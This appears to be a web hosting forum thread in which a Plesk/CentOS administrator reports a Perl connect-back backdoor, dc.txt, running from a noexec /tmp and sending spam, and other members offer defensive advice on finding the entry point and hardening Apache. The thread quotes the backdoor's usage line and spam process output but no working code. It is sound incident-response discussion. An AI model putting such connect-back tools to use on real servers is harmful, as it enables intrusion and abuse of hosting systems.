Hello all,

I have a PLESK 8.3.0 system, with centos 5, and all working fine, with SA, MOD security2, etc.

Recently I have discovered a worm/backdoor in my /tmp system ( and it's mounted as noexec, etc ).

The backdoor is a mail spammer:

perl dc.txt
Data Cha0s Connect Back Backdoor

Usage: dc.txt [Host] <Port>

It's in PERL, and if I do perl dc.txt it works fine ! ( and it's noexec /tmp part :S )

Now i have lot of SPAM:

qmailr 17179 0.0 0.0 3360 672 ? S 14:49 0:00 qmail-remote bol.com.br apache@newlightsystems.com felicianoriacho@bol.com.br
qmailr 17180 0.0 0.0 4720 1052 ? S 14:49 0:00 /var/qmail/bin/qmail-remote.moved bol.com.br apache@newlightsystems.com felicianoriacho@bol.com.br


And i wanted to know how to verify what web is causing this.. i have 150 domains so it's quite slow to verify domain per domain..

Any illumination here ?

Thanks

They got in through a vulnerable script so search through your logs for the file in question (dc.txt). Then you can locate the hackers IP address.. and search for that also.



To search for general nasty commands trying to exploit vulnerable scripts:



Usually when someone gets access they try and hide code in any directory that's writable by apache:

Use these commands to search for .php , .pl, .cgi files which are owned by apache (they usually hide them in tmp or upload directories):



Also they usually like to drop a crontab entry for apache. Make sure that you can't have anything bad in your apache cron:

hello,

good tips, thank you , I will try later

You're executing /usr/bin/perl and that is not on the noexec /tmp partition. This is why mounting /tmp as noexec is not really useful against exploit scripts. It would have stopped executing '/tmp/dc.txt' (after setting the execute bit on it). And it would have stopped a binary in /tmp from executing, but the attacker could just run a script to copy the binary to some other place on the system that's not mounted noexec (this is why directories with 777 permissions are nasty).

Are you running the grsec-enabled ASL kernel? Because if you are then I don't believe the apache user should have been allowed to execute something like 'perl /tmp/dc.txt'.

Also I've found that most of these exploits are with older sites which needed register_globals enabled for them to work (a very bad practice).

To search for sites that have register_globals enabled in .htaccess:

That whole "securing /tmp" thing has been snake oil from day one. It hasn't ever worked.

Hello again.

From danami's tips, I can't locate the web who executed dc.txt with the egrep commands, but I will try to find them searching other things, as this is probably a php nuke or some CMS not updated.

I think It's a real problem for hostings like I do, as there are lot of different webs, portals, cms, forums, and I need real flexibility,the best way to secure this is to jail apache in its own location, and I have tried It without a good result.

/tmp is needed by many programs and as I can see there's no way to real-secure this.

If I charge mod_security with thounds of rules, i will probably detect more worms like this or xploits / script-kiddiers but must of my webs will be down.

Are you running the grsec-enabled ASL kernel? --> No I'm running a :

Linux 2.6.18-53.1.4.el5 #1 SMP Fri Nov 30 00:45:16 EST 2007 i686 i686 i386 GNU/Linux ( CENTOS 5 )

I'm searching a good way to permit my clients install all their CMS but with good security.. for good security I understand that if a CMS is vulnerable to any attack, this xploit won't work on my server

cheers,

IF you are feeling adventurous then maybe mod_suphp is right for you. Look at step 18:
http://www.web-hosting-control-panel-ad ... _Server/6/

/tmp is not the threat in this case, its just a directory the application happens to be able to write to. Ive seen badguys use the httpdocs/ dir just as often as anything else. The real threat here is your applications, Id start by getting a handle on what those are. Sites like securityfocus and secunia

Are you running ASL already? If not that is a good place to start. If you're running into modsec rules that are causing problems with your sites, let us know so we can update the rules.

mod_suphp changes the threat around, I dont think it would effect the situation here in a positive or negative way (well maybe negative). Specifically the tactic being exploited here is:

1) a vulnerable application will execute code uploaded
2) apache runs as the apache user, meaning it can only write to world writable dirs like /tmp, or bad permissions on user owned files/dirs (chmod 777), or apache writable caching dirs (used by smarty, joomla, etc.)
3) mod_suphp would run the application as the owner of the directory/files. Meaning that the attacker can now not only write to elements in 2, but now also all files owned by the user (httpdocs/*). Including being able to upload/modify the application itself.

Hi again,

no I haven't got kernel ASL or ASL at all.

Supposing that I'm managin about 150 domains ( and 200 subdomains for an entire domain ) with lots of different CMS, will be any problem changing kernel to ASL kernel or ASL system ?

Since now, I have my own modsecurity rules ( also downloaded from gootrot.com , and other custom ones ) and if there's a web that isn't working well i made an exception, all ok.

But i want to avoid this external code execution ( typical bug with phpBB, loading another external script ) and code execution inside ( perl scripts, linux scripts.. etc )

mod_suphp will help with this ? I'm planning to add mod_suphp also ( so users can upload gallery photos for example, and then delete via ftp ) but I have read that this mod changes all configs when plesk is updated for example

thanks,

Nope there wouldnt be any problem with it on a box like that.